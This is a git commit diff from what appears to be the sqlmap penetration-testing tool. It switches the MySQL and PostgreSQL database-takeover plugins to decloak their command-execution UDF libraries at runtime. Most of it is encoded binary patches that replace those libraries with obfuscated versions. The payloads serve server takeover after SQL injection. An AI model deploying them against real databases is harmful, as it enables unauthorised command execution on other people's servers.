 create mode 100644 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll
 create mode 100644 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
 delete mode 100755 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll
 create mode 100644 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
 delete mode 100755 udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll
 create mode 100644 udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
 delete mode 100644 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll
 create mode 100644 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_

diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index ec018ee82..000b03246 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -10,6 +10,7 @@ import re
 
 from lib.core.agent import agent
 from lib.core.common import Backend
+from lib.core.common import decloakToTemp
 from lib.core.common import isStackingAvailable
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
@@ -79,10 +80,12 @@ class Takeover(GenericTakeover):
         self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
 
         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll")
+            _ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_")
+            self.udfLocalFile = decloakToTemp(_)
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so")
+            _ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_")
+            self.udfLocalFile = decloakToTemp(_)
             self.udfSharedLibExt = "so"
 
     def udfCreateFromSharedLib(self, udf, inpRet):
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index 6d29b6cb5..f7766cc74 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
 import os
 
 from lib.core.common import Backend
+from lib.core.common import decloakToTemp
 from lib.core.common import randomStr
 from lib.core.data import kb
 from lib.core.data import logger
@@ -60,10 +61,12 @@ class Takeover(GenericTakeover):
             raise SqlmapUnsupportedFeatureException(errMsg)
 
         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll")
+            _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
+            self.udfLocalFile = decloakToTemp(_)
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so")
+            _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
+            self.udfLocalFile = decloakToTemp(_)
             self.udfSharedLibExt = "so"
 
     def udfCreateFromSharedLib(self, udf, inpRet):
diff --git a/udf/mysql/linux/32/lib_mysqludf_sys.so b/udf/mysql/linux/32/lib_mysqludf_sys.so
deleted file mode 100644
index 9eb5e82badd132a0ea3832389c9eefa5ca4fc9de..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5696
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

diff --git a/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/udf/mysql/linux/32/lib_mysqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..7e0eeb95ebc82c897b5a66876b6b6dcb005b7a54
GIT binary patch
literal 2512
zcmV;>2`}~sob4w96D-$izX@T)HZ$g=p>h;;kI%xytY>fI990&AG(M=J$!%>K!Aj0F
z6CC?yzvqxMz(21uxG)henb4*&WNOvcs%t8=>m|xH+Rz)3wn|S~MKasi)~*@JC7|h&
zjf}Sp-a?Kbf|0iVvjFz2;|$M2zXZ=l_nrIozUkfikj)t!*{6R2SH+8GBznBLoY$`%
zU2NDbNrx)3W12wYrJNa{;2k6H%8`6kBR@>3-f^tLm7`w9cJ+PGqhPA-Q_qvtP<i@o
z_I~7lx?t!*bgqC0X7L@M8b4=>7r|0~4Smgcx_B2}&{NVrN33-hw#5nd!LVt60)7{6
z&|{#=198*yI>sEni_vG@;hD$y*iyZNzL4?Q?^(Izak#lZ_a)?AG$vmmIsSLlugzZ6
zW0_1(_|xZOdN_o~OVrI-B$aDCYWYW>`X@hQ$8yIWcKN=H>HxXC_cP}xyN+}J>XXv$
z#QlfgHy}^~00<1#+W=+z{qw=M%HRC+(**bHF#jD9yyJzw0Gvdlw!W+b8jeLR=l%7_
zyFeo$)d<&Y#_E&7Eb9Od>G(F~!n=!u_pVnKR=f40@2&FbP5?VY&G-ZXhvcu516hk~
zxD(ADk;c_k|BcG~?PLF4N|+Mk4RFc(sQ-S#_mli)$-8#{0>a;0{RE_slk8pn9g?q*
zK|1XKGxGD~&l_>r_yk8Y?J5-jlk{{pL4O5)lG_l<T2pod0#463luoC|R{6^wDHDJE
zv(BtQS`%T;;i9a*i1mT&pmydR*Nq&&NGAG=gZ>;?_iW|&u)TWUd)yqs+dlt7H|Q0T
zFo3*p{04yJwZNAo@Kis)bowAN^4S*tH^3+)@QXe`e*Mc^V0|Gh%nV@V1V8@_i~Tu}
z`<+9dE&+b{DZpS^`Bu<0v-sRU`AzUNp#Nsc%;)Qj%1)o6`fRGt#{*)aCwEnR-2qej
zT%iy*%(tb>C{PN9YbrI=I{b=VR#R=->5KMPyIjfkai7wo_&u?4+1F7%43(kWR;ej2
z>Xv;h<WT^`Rqu1f%&OZ}5y!A`MzM5MeGROGI-~waEYv$wZ|@!i{9a076`!=gqW(8K
zaj>{!mmO1H4yk+tEGI*6k!n`wb4a6Eu%9-MSQ1ok&Xm|QUhh}j9uuZ>dTA?Gn(dl?
zHnFZYG;0euJ(99{CRm3*=YF?cyC_Vb)b1$#@UjV2bpU}cY7`iowh^wa^Q{jA+*DZ0
z)wv~xs{?-RL3#!OeUM@)p8xJBz%kqSo`a7~P%DJ1_FAe8g*~&-+G>)^Guh7mHS2*d
z!uQCZZ~uq~nUnK+#AJy;HvC)h-*0HjN8frz5r>TsPz`tWXALKlAw6-P)s+tcX&M*%
zeht_&Kw7@R$p%*9z&LOX*dv>ed|8NNX{-#$UXn0~w?#%kIs8lUKyCkM4G*wpqj(_q
zUx&6ZU57UQesj(<C;Lpu9xi7-aZ7$Hh?`%uR)h^4>ce>wJILVJwPEbLdouN-qlO-1
zx~R^`;Le%`eE(sGNzJW;0>)I>*hk@@_Z*zSY&vg?D6c<E<9oi9U#hQhfp`5#N*f`4
z@gE>)3$Bg0al95`VUiNMNr8q1)h!~!vobX&lty$)x{gE;C98rB`WIUKP-F!J+@6kP
z6t7er`bra>0nnDxZy5t5tDF<F_66cl{bdOd)6Tmk2(<Mc17^1t0TWr8X!N69a1gcu
z3!IlV(q-0x0^_0yAr}(s)2nIqVu7|9cr5-yz1E8DGEW80b`sFglQI2XhrY(s1mo1$
zg$s+3!QiwGwzponeox`K8HKM}%);#9@caup<=8K{5B|`$Pvg+@qDc{?dDMlENk1?-
z^$D}uxI-f?V77(XNi6jAJs-nNA;$|aG^4FV14ckqSb_(>P7Zv+U4*2(W-NpfMb)na
zol>oy-+5q%1Jo42f~hqIIEE<d`%TdEpbq0J0zwDh9HfQy+nO!j6y%x=yOGSK`qMpH
z2s{wGd6hX0TT_67KdwBz$=6>isLs}72Y^~)y0@~Q*@o}#-$&OUrkT{(jV!vi9qhv9
zlzgH$BFo01jepvyt+85*^<}{fE+oU$iW1v`YT&Yw3z^-X#s~xl7x44oPS^E0r{3n$
z*4fovKM{ZA53M0oA1ticfofsB-gc35)R^Zu-LCc8bQOAvz0rPRrWKu@i*FA`OZjO_
z7O>jV+gYZ$C~@wAdJog<fWh$eaWDw;8WWldZ9;QlpX_PI6~II0rrzfw1X1QihluOz
zgXiu?J!*i;z3##9G3JXDeTTy9(3_nFtxWZJ-I3lW9fOq76k-MSr_Vm6&iaLYhVp4x
z<cMKt^v!+OOBr9J0m06~wgv85<)apVyR8nw+)*_KViG7W&1}_66bi`9o76;;7A?k1
z<PA|gEj;=`clvih140&qhIspyzy+)nQ4E@9>YVgcCo{i_#|@?eQ)fK-GcQ{>v+IBw
zon(PpL-W`&!xw={&D&y^eX7(^HQoMzW$A9^m|MbmVTuZh6)+=h<Nky|b-NjY-FYha
z$f7{enT$0~M|Cr*t*zmdUdEukrJF@YW)^51vQ?URcE44LE>=}o1rgiw#ZgwFgyfhf
z?XC&09giohnG*Mav88|_Smr`g8?Raa0O-ML)yna~g>BDcxRc?TV6S=yNWi)ORnQo>
za|YbT&(_UM_}%ylM86o1+W5U|2tq@4BBT33%DAWDZes7+2Uf-Ml|8zb+xP-&NXqQp
z=9V7F$8<8^8}#XA@U36}YzOh@jJLv-R7invVmka2!%5ZEt!$SOlnI9XP7aj>r3A&7
zLJ`kRA^hK}-8FCKkLusa+?}zcMCd4j%-!B>ECr&Rt9GuTxlTIpfl*#MZ^v};h|1jN
zR@kjI-S80JGu(FBL-e|(ps#$VS`2tAMxlUy&ccC&7R+FBdcc6JngF~=-fc0<&^M0a
z8~l&ocmX`YL$WLpUJ|tBzTtN}m@EK?_l`%*LZl%HL=j0IZihyR3*62MNx~m>+&B_$
zhenJ`75P_?QsVvBU%QwDHz2dvwQRu@P4jBYn6o!Z6RIKuVH^AebK+0;k;E49;$zqy
z!I_1k+?-Xm;AN-)oP$Rwk*ZSTo3;ChdMGT!7DaKX#e%~SfH#MQV^Kr`18HNfayKdl
z>@|eL@xk3<=?H0@jaM~e<6=_fTjc2waN%{b&batTGso?>;A2suL%2L?oXf>lpWRqj
zDa0nfBz0+H_5jq<VBSWMoYVR|`i^>s6k9DiVcfH6W3DV&<?-)08{dq#j8|~(Tbugr
abPmra8=Hk_C+aYi<-R^94*z*GQo@nAG7*3P

literal 0
HcmV?d00001

diff --git a/udf/mysql/linux/64/lib_mysqludf_sys.so b/udf/mysql/linux/64/lib_mysqludf_sys.so
deleted file mode 100644
index 9c6999ecd10d22aa62b339108199b095be3dd339..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8040
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

diff --git a/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/udf/mysql/linux/64/lib_mysqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..c7a4d7a10bbf444af2bfe39749aed698d3236551
GIT binary patch
literal 3200
zcmV-`41e<noW&*t4=dGXK)aj3J>s%okMPWDiF<_-l7d}z88%%=2`+VlKhPRB5t6mZ
z?z#kgiQ`;MF66qdEfhpE?I))##gQ$`C#&c`3tnr-c)oQC15YK|BIEmohz<J!_W@W&
z1UEbX7SGPv-~9pS`@Zv?=R)`1n-qPQMPhNrlZ#RxS7KAN<u&3=Is#R|%^LaeK!J_7
z3-j6F7W9}S8#A%~(Ghp#UE+(zS4L+H+5@Ld*UmNxl^ZBF`eR5eEJwP@1<5YGUU0A;
zlv2z1M3##Ngg|(^Uf<I}M)CSJU!Qnp!^Hkpg+n^f<3XvL*)PcFJz;tIQ$7$y<bB92
zUgK{wgY0e{oO1?K$ryDB*sQZ&1Xh-IkT`R1?>jx$_p}yy<k1U4p7D_%6G!BceCVHk
z`D4iAHwkc{gQ;ioq&~{{u#cp=F2+IX3%eBnMgi}E`6N^#B=VZOuoF|&N}k$GnH`)p
zLC#skzQewlF%m_W_-Ggj?-jZS{pQ{%K=!o9rw|2A^{MCZ3RGA^^X{>?w@U9}_0$9i
z-w!PE?r5gOWneL2-?KEY1WOLV2mOPpn%6+s_u$Mn=}Ztv&)?p><D%cc3IF!Q%lkE&
zSSf3)Wd`z*;O;JiOV2e?XYKoR4MuqD?;uW<bHZRA_9yf7NzMClI8ncW50|7shgtfU
zZU0mGxiIqcFv4t-LEn52Q>JzNHo})%{XlLJlKcp5L0$1$YmX@6-&@>J$1wOPi2$Bi
z)`xAMUj9IB0I%RM<TM7nDMNbf1+P*#h!7k}|IlW(%m^p1#b~k#7U3g30a=irCd6nY
z{HgO>?LQ!&nw!Q}M*I+{-Z-QM9OS=|{PXqvZTZ<<`6fOA{#W@9l3-vGSxkrkfcPBb
z-!S}z<QS{ur-Jm~SU?)YKteaWOY-xe<fnxE3zDA{iNBTfw~;~L-^P*tDlPoWi6A@i
zXl(ya`Pnf60W|y~q@P{_zPDjr{WKPn&hUAAgEFnrH&3C5;ssC0f{o!fXUO{YZy|;y
z!q*g22if}IEv;6Z(6t9DG*^+(ZLC_nQP|p%xUQwGp-!0SH+#d8#uu<Yd<>nT+@$HE
zsI?UJM)LYEi&w97I8*9t;wxg-XN~`TiTW3$k+rsl9aEvlT=lVWwq9%29N~t(WhWG<
zrCKG=9nqL+9uCcxWnQ*>i`BO~Y$X6s2}%WH{q#EAC<uL;lha8wXRv5_>6@Icz;q%M
z<*sHMQnJ3USrrQ$Bhv?ktjQ^U=k>lj)CfUz6>?redxN!6k+67gs5g8hYp5b8YOL@o
z_~!J@Eaw&hj$rj1*8eewy$~N2n{Q!;wY)iWpp({izsC*v;3s5<u>J&Aro(+u-t&)l
z{11T`<Z$o327T>m2l4#pY6tP$D_ih9dLeEH@tiMJ@WXq)GvLKX=XJceDk*gXp}?zs
z0EWO&ZU>LRuWJYKW3?&Zy?x(P@Zu?8YzOfH(oyi@MltRBz@3?KgPp-d4Ox|s)FBAk
zoGdP&PqQ0I{Et_zgjAH9(OU$>gewhE%11P^cv1#c%13Il-Ihas8k~LEI8p{{%16Z6
z`%(r+%15->&6eytW`|4L7RldpcxJ=R##8xBln!^Z6jJ#Dln&^!G*kH^ln%(Um6rT@
z%10~NO*8>|8e^iY9m&t3j69R|CGxXZ<B%JfTJJq(hh6*0Hq&eSG&1G@Ml&Ajt=+oQ
